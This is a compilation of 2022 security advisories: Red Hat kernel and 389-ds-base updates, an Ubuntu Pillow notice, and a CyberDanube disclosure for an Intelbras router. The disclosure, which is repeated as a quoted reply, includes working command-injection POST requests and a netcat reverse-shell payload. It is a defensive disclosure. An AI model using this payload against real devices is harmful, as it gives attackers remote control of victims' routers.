kernel-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-core-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-core-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-modules-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-modules-extra-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-modules-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-modules-extra-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-libs-5.14.0-70.36.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
python3-perf-5.14.0-70.36.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm

noarch:  
kernel-abi-stablelists-5.14.0-70.36.1.el9_0.noarch.rpm

ppc64le:  
bpftool-5.14.0-70.36.1.el9_0.ppc64le.rpm  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-core-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-core-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-modules-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-modules-extra-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-modules-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-modules-extra-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-libs-5.14.0-70.36.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
python3-perf-5.14.0-70.36.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm

s390x:  
bpftool-5.14.0-70.36.1.el9_0.s390x.rpm  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-core-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-core-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-modules-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-modules-extra-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-modules-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-modules-extra-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-tools-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-core-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-modules-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-modules-extra-5.14.0-70.36.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
python3-perf-5.14.0-70.36.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm

x86_64:  
bpftool-5.14.0-70.36.1.el9_0.x86_64.rpm  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-core-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-core-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-modules-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-modules-extra-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-modules-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-modules-extra-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-libs-5.14.0-70.36.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
python3-perf-5.14.0-70.36.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.9.0):

aarch64:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-cross-headers-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-debuginfo-common-aarch64-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
kernel-tools-libs-devel-5.14.0-70.36.1.el9_0.aarch64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.aarch64.rpm

ppc64le:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-cross-headers-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
kernel-tools-libs-devel-5.14.0-70.36.1.el9_0.ppc64le.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.ppc64le.rpm

s390x:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-cross-headers-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-debuginfo-common-s390x-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
kernel-zfcpdump-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.s390x.rpm

x86_64:  
bpftool-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-cross-headers-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debug-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-debuginfo-common-x86_64-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
kernel-tools-libs-devel-5.14.0-70.36.1.el9_0.x86_64.rpm  
perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm  
python3-perf-debuginfo-5.14.0-70.36.1.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1158  
https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/cve/CVE-2022-2959  
https://access.redhat.com/security/cve/CVE-2022-21123  
https://access.redhat.com/security/cve/CVE-2022-21125  
https://access.redhat.com/security/cve/CVE-2022-21166  
https://access.redhat.com/security/cve/CVE-2022-23816  
https://access.redhat.com/security/cve/CVE-2022-23825  
https://access.redhat.com/security/cve/CVE-2022-26373  
https://access.redhat.com/security/cve/CVE-2022-29900  
https://access.redhat.com/security/cve/CVE-2022-29901  
https://access.redhat.com/security/cve/CVE-2022-43945  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/solutions/6971358

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5j9+dzjgjWX9erEAQjSXxAAhEihoM+2Y0PUAdnoM55yPu0hNbruEYor  
/a+0kD2hhj9jeHm0ixX7bEa6g4dFRRVHxCGjPkvCuxmwB2+z27XWyDssyGP6NHG9  
z4hKa2yFVG0QCNDxum2FjF8GVhHELESuuGm+9ouJ6y18YUSkbmVts08PBa2pA79v  
0HLCMg7lHqdVIpgJ1eUIWBxU9t9yd09NZazyQEx4nKuAw44tJvljw96xpxp1Nnhe  
pIMsceSrmT3HYuhkhqaScT5gy0MHKSbLC8iJeX54UFJeY/tD2XX7DwdAB1jdxEv3  
8+vkmkgNFmCcxQlryjANle7URr/Z2i5An0ejRTN9tL1fWxB6UJbsU55x2zjQQBRs  
u90Yingm1b5vwEQp7+J0R1tSW34MnXwBcP8lU0ZTeZ6c7gaRkHArJpEfDXndJUDy  
OjGf5OI93n1ixyLUgCAF6/jwUNRy+yGWiqvvaHD4pJb79O/IESotOFxNWZ3vYPfL  
QElAENKuEF0SiS3gTe/2RZ5I+wIpnrdGmTkS4as4kyb1zvSERJY2eTC6UDQgMi15  
8u8yxMqpdtYO8+4knYwSDxYaplH+cC6Ktxso8cpskOdOstSChWC6plblOvGfRFTA  
VeDwyTZ3bG0v7WKZJ0Xl3L3ZR9yDz3XSUBADx2PN8VdyoetCFX7xgDPK7fL2rhvV  
jBvWwm6iwuc=  
=qCP1  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8973-01

Red Hat Security Advisory 2022-8976-01 - 389 Directory Server is an LDAP version 3 compliant server. The base packages include the Lightweight Directory Access Protocol server and command-line utilities for server administration. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: 389-ds-base security update  
Advisory ID:       RHSA-2022:8976-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8976  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-0918 CVE-2022-0996 CVE-2022-2850   
=====================================================================

1. Summary:

An update for 389-ds-base is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

389 Directory Server is an LDAP version 3 (LDAPv3) compliant server. The  
base packages include the Lightweight Directory Access Protocol (LDAP)  
server and command-line utilities for server administration.

Security Fix(es):

* 389-ds-base: sending crafted message could result in DoS (CVE-2022-0918)

* 389-ds-base: SIGSEGV in sync_repl (CVE-2022-2850)

* 389-ds-base: expired password was still allowed to access the database  
(CVE-2022-0996)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the 389 server service will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2055815 - CVE-2022-0918 389-ds-base: sending crafted message could result in DoS  
2064769 - CVE-2022-0996 389-ds-base: expired password was still allowed to access the database  
2118691 - CVE-2022-2850 389-ds-base: SIGSEGV in sync_repl

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
389-ds-base-2.0.14-3.el9_0.src.rpm

aarch64:  
389-ds-base-2.0.14-3.el9_0.aarch64.rpm  
389-ds-base-debuginfo-2.0.14-3.el9_0.aarch64.rpm  
389-ds-base-debugsource-2.0.14-3.el9_0.aarch64.rpm  
389-ds-base-libs-2.0.14-3.el9_0.aarch64.rpm  
389-ds-base-libs-debuginfo-2.0.14-3.el9_0.aarch64.rpm  
389-ds-base-snmp-debuginfo-2.0.14-3.el9_0.aarch64.rpm

noarch:  
python3-lib389-2.0.14-3.el9_0.noarch.rpm

ppc64le:  
389-ds-base-2.0.14-3.el9_0.ppc64le.rpm  
389-ds-base-debuginfo-2.0.14-3.el9_0.ppc64le.rpm  
389-ds-base-debugsource-2.0.14-3.el9_0.ppc64le.rpm  
389-ds-base-libs-2.0.14-3.el9_0.ppc64le.rpm  
389-ds-base-libs-debuginfo-2.0.14-3.el9_0.ppc64le.rpm  
389-ds-base-snmp-debuginfo-2.0.14-3.el9_0.ppc64le.rpm

s390x:  
389-ds-base-2.0.14-3.el9_0.s390x.rpm  
389-ds-base-debuginfo-2.0.14-3.el9_0.s390x.rpm  
389-ds-base-debugsource-2.0.14-3.el9_0.s390x.rpm  
389-ds-base-libs-2.0.14-3.el9_0.s390x.rpm  
389-ds-base-libs-debuginfo-2.0.14-3.el9_0.s390x.rpm  
389-ds-base-snmp-debuginfo-2.0.14-3.el9_0.s390x.rpm

x86_64:  
389-ds-base-2.0.14-3.el9_0.x86_64.rpm  
389-ds-base-debuginfo-2.0.14-3.el9_0.x86_64.rpm  
389-ds-base-debugsource-2.0.14-3.el9_0.x86_64.rpm  
389-ds-base-libs-2.0.14-3.el9_0.x86_64.rpm  
389-ds-base-libs-debuginfo-2.0.14-3.el9_0.x86_64.rpm  
389-ds-base-snmp-debuginfo-2.0.14-3.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-0918  
https://access.redhat.com/security/cve/CVE-2022-0996  
https://access.redhat.com/security/cve/CVE-2022-2850  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5j989zjgjWX9erEAQhFpA//f3BgIOqDP4Hb5QK1XffVKrEFJMNhGTWV  
Dzf1cvzdjl/JHvY5A47DtNQiW4Y/xlJZSkNnNTkFCuCbmIaCiDhr0M4hJbKOmb4z  
B1fv/tQ4rI46oGUrIPxtqNn5/AuV/EVh7TQCo5U3efoM20WGCrQ9Eea4LfUrczDx  
+5AIXQYLmfjh8HXSrqeR7p0V6xRskYviK0CVURZz7M8JydkfFP5OX4T2FL58mAzz  
4luyrG+mgNfAx4fS6X7O/gGliwoSXRzYqHU+PhfB9kxlpzD4bLE078XAvf/3ev5r  
A657Wp4y2FlAlE/4TZKGujXTzzXalLpoMD26BdL40gz8XaiqjciqDg6XrFW0MTKy  
2C5SvnhRu2IAoXBgz7l3t6f5A8GIYxpCeEfS7337osMYMZr7g63lTbKlzWro3Bwd  
qn/tc568jxuuvH3AMLe65WWWf6dDxO9ojXyk0aUukbKMtWUXjv1Zj0gKhfgf8MJR  
H0Ymdh8pcbmrWFt+VRZvnAGyPTYb3zEYn/4w7h07isd/3nmlK6ZjLmpqPx3a9Rbi  
cYv+rZIUObGZNp/bJr/zVh7IT0SfGQobPOLyF9GjkHPNdsJggD73O5TyTOnOcuoq  
dY6RRf3dxUhWKJqtCjBYjNQO9XwevUUmedMyUD5NxQpwaNnLFjfXy4O7hzoVOrgI  
F8cFMeBtILw=  
=GQ6J  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8976-01

Ubuntu Security Notice 5777-1 - It was discovered that Pillow incorrectly handled the deletion of temporary files when using a temporary directory that contains spaces. An attacker could possibly use this issue to delete arbitrary files. This issue only affected Ubuntu 20.04 LTS. It was discovered that Pillow incorrectly handled the decompression of highly compressed GIF data. An attacker could possibly use this issue to cause Pillow to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5777-1  
December 13, 2022

pillow vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in Pillow.

Software Description:  
- pillow: Python Imaging Library

Details:

It was discovered that Pillow incorrectly handled the deletion of temporary  
files when using a temporary directory that contains spaces. An attacker   
could  
possibly use this issue to delete arbitrary files. This issue only affected  
Ubuntu 20.04 LTS. (CVE-2022-24303)

It was discovered that Pillow incorrectly handled the decompression of   
highly  
compressed GIF data. An attacker could possibly use this issue to cause   
Pillow  
to crash, resulting in a denial of service. (CVE-2022-45198)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   python3-pil                     9.0.1-1ubuntu0.1

Ubuntu 20.04 LTS:  
   python3-pil                     7.0.0-4ubuntu0.7

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5777-1  
   CVE-2022-24303, CVE-2022-45198

Package Information:  
   https://launchpad.net/ubuntu/+source/pillow/9.0.1-1ubuntu0.1  
   https://launchpad.net/ubuntu/+source/pillow/7.0.0-4ubuntu0.7

Ubuntu Security Notice USN-5777-1

Intelbras WiFiber 120AC inMesh version 1.1-220216 suffers from an authenticated command injection vulnerability.

    CyberDanube Security Research 20221009-0-------------------------------------------------------------------------------                 title| Authenticated Command Injection              product| Intelbras WiFiber 120AC inMesh   vulnerable version| 1.1-220216        fixed version| 1-1-220826           CVE number| CVE-2022-40005               impact| High             homepage| https://www.intelbras.com                found| 2022-08-01                   by| T. Weber (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com------------------------------------------------------------------------------- Vendor description------------------------------------------------------------------------------- "We are Intelbras. A company that for 45 years has been offering innovativesolutions in security, networks, communication and energy. Our dream began tocome to life there in 1976, in the city of São José, having originated from anINspiration and a promising idea: to manufacture PABX centrals. During the80's, we surprised the market with the launch of the first PABX developed withnational technology, a product that showed everyone our innovative DNA. The 90swere marked by the consolidation of the company in the telecommunicationssegment and we became leaders in the PABX and telephone terminals segment. Theturn of the millennium represented the search for greater connection andproximity to people, something that is in total harmony with our philosophy tothis day. More consolidated in the market, in 2010 we opened 3 manufacturingunits, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.We reached our 45th birthday having reached a historic milestone: we have beena company listed on the B3 since February 2021. Our trajectory so far has beenINnovative, INtelligent and INSpiring. We saw innovation, which is part of ourDNA, increasingly present in our daily lives. And it was only possible towrite a story so full of achievements because employees, partners and customerswere close and believed in us."Source: https://www.intelbras.com/en/institutional/who-we-areVulnerable versions------------------------------------------------------------------------------- WiFiber 120AC inMesh / 1.1-220216Vulnerability overview------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2022-40005)The web server of the device is prone to an authenticated command injection.It allows an attacker to gain full access to the underlying operating system ofthe device with all implications. If such a device is acting as key device inan industrial network, more extensive damage in the corresponding network canbe done by an attacker.Proof of Concept------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2022-40005)The web server is prone to an authenticated command injection via POSTparameters. The following proof-of-concept shows how to inject the command"ls /" to the system which gets executed in the background:=============================================================================== POST /boaform/formPing6 HTTP/1.1Host: 192.168.3.147User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 87Origin: http://192.168.3.147Connection: closeReferer: http://192.168.3.147/ping6.aspUpgrade-Insecure-Requests: 1pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 =============================================================================== The following commands can be used to open a reverse shell:"rm -f /tmp/f""mkfifo /tmp/f""cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"Those commands were sent via a crafted POST request:=============================================================================== POST /boaform/formTracert HTTP/1.1Host: 192.168.3.147User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 255Origin: http://192.168.3.147Connection: closeReferer: http://192.168.3.147/tracert.aspUpgrade-Insecure-Requests: 1proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 =============================================================================== The vulnerability was manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution------------------------------------------------------------------------------- Update to firmware version 1-1-220826.https://backend.intelbras.com/sites/default/files/2022-08/ONT_Wifiber_120_AC_Vers%C3%A3o_1-1-220826.zip Workaround------------------------------------------------------------------------------- NoneRecommendation------------------------------------------------------------------------------- CyberDanube recommends Intelbras customers to upgrade the firmware to thelatest version available.Contact Timeline------------------------------------------------------------------------------- 2022-08-02: Contacting Intelbras via suporte@intelbras.com.br.2022-08-03: Request from Intelbras to send the advisory tocsirt@intelbras.com.br; Sent the advisory to this address.2022-08-30: Asked for status update; Vendor answered that the new firmware             version has been released the day before. Set the disclosure date             to 2022-10-03 (60 days policy).2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.2022-10-09: Coordinated disclosure of advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF T. Weber / @2022On 09.10.22 17:21, Thomas Weber wrote:> CyberDanube Security Research 20221009-0> ------------------------------------------------------------------------------- >>                title| Authenticated Command Injection>              product| Intelbras WiFiber 120AC inMesh>   vulnerable version| 1.1-220216>        fixed version| 1-1-220826>           CVE number|>               impact| High>             homepage| https://www.intelbras.com>                found| 2022-08-01>                   by| T. Weber (Office Vienna)>                     | CyberDanube Security Research>                     | Vienna | St. Pölten>                     |>                     | https://www.cyberdanube.com> ------------------------------------------------------------------------------- >>> Vendor description> ------------------------------------------------------------------------------- >> "We are Intelbras. A company that for 45 years has been offering > innovative> solutions in security, networks, communication and energy. Our dream > began to> come to life there in 1976, in the city of São José, having originated > from an> INspiration and a promising idea: to manufacture PABX centrals. During > the> 80's, we surprised the market with the launch of the first PABX > developed with> national technology, a product that showed everyone our innovative > DNA. The 90s> were marked by the consolidation of the company in the telecommunications> segment and we became leaders in the PABX and telephone terminals > segment. The> turn of the millennium represented the search for greater connection and> proximity to people, something that is in total harmony with our > philosophy to> this day. More consolidated in the market, in 2010 we opened 3 > manufacturing> units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.> We reached our 45th birthday having reached a historic milestone: we > have been> a company listed on the B3 since February 2021. Our trajectory so far > has been> INnovative, INtelligent and INSpiring. We saw innovation, which is > part of our> DNA, increasingly present in our daily lives. And it was only possible to> write a story so full of achievements because employees, partners and > customers> were close and believed in us.">> Source: https://www.intelbras.com/en/institutional/who-we-are>>> Vulnerable versions> ------------------------------------------------------------------------------- >> WiFiber 120AC inMesh / 1.1-220216>>> Vulnerability overview> ------------------------------------------------------------------------------- >> 1) Authenticated Command Injection> The web server of the device is prone to an authenticated command > injection.> It allows an attacker to gain full access to the underlying operating > system of> the device with all implications. If such a device is acting as key > device in> an industrial network, more extensive damage in the corresponding > network can> be done by an attacker.>>> Proof of Concept> ------------------------------------------------------------------------------- >> 1) Authenticated Command Injection> The web server is prone to an authenticated command injection via POST> parameters. The following proof-of-concept shows how to inject the > command> "ls /" to the system which gets executed in the background:>> =============================================================================== >> POST /boaform/formPing6 HTTP/1.1> Host: 192.168.3.147> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 > Firefox/91.0> Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8> Accept-Language: de,en-US;q=0.7,en;q=0.3> Accept-Encoding: gzip, deflate> Content-Type: application/x-www-form-urlencoded> Content-Length: 87> Origin: http://192.168.3.147> Connection: close> Referer: http://192.168.3.147/ping6.asp> Upgrade-Insecure-Requests: 1>> pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 >> =============================================================================== >>> The following commands can be used to open a reverse shell:>> "rm -f /tmp/f"> "mkfifo /tmp/f"> "cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f">> Those commands were sent via a crafted POST request:>> =============================================================================== >> POST /boaform/formTracert HTTP/1.1> Host: 192.168.3.147> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 > Firefox/91.0> Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8> Accept-Language: de,en-US;q=0.7,en;q=0.3> Accept-Encoding: gzip, deflate> Content-Type: application/x-www-form-urlencoded> Content-Length: 255> Origin: http://192.168.3.147> Connection: close> Referer: http://192.168.3.147/tracert.asp> Upgrade-Insecure-Requests: 1>> proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 >> =============================================================================== >>> The vulnerability was manually verified on an emulated device by using > the> MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).>>> Solution> ------------------------------------------------------------------------------- >> Update to firmware version 1-1-220826.>> https://backend.intelbras.com/sites/default/files/2022-08/ONT_Wifiber_120_AC_Vers%C3%A3o_1-1-220826.zip >>>> Workaround> ------------------------------------------------------------------------------- >> None>>> Recommendation> ------------------------------------------------------------------------------- >> CyberDanube recommends Intelbras customers to upgrade the firmware to the> latest version available.>>> Contact Timeline> ------------------------------------------------------------------------------- >> 2022-08-02: Contacting Intelbras via suporte@intelbras.com.br.> 2022-08-03: Request from Intelbras to send the advisory to> csirt@intelbras.com.br; Sent the advisory to this address.> 2022-08-30: Asked for status update; Vendor answered that the new > firmware>             version has been released the day before. Set the > disclosure date>             to 2022-10-03 (60 days policy).> 2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.> 2022-10-09: Coordinated disclosure of advisory.>>> Web: https://www.cyberdanube.com> Twitter: https://twitter.com/cyberdanube> Mail: research at cyberdanube dot com>> EOF T. Weber / @2022>

Intelbras WiFiber 120AC inMesh 1.1-220216 Command Injection

Red Hat Security Advisory 2022-8974-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include buffer overflow, code execution, out of bounds write, and privilege escalation vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2022:8974-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8974  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-1158 CVE-2022-2639 CVE-2022-2959   
                   CVE-2022-21123 CVE-2022-21125 CVE-2022-21166   
                   CVE-2022-23816 CVE-2022-23825 CVE-2022-26373   
                   CVE-2022-29900 CVE-2022-29901 CVE-2022-43945   
=====================================================================

1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
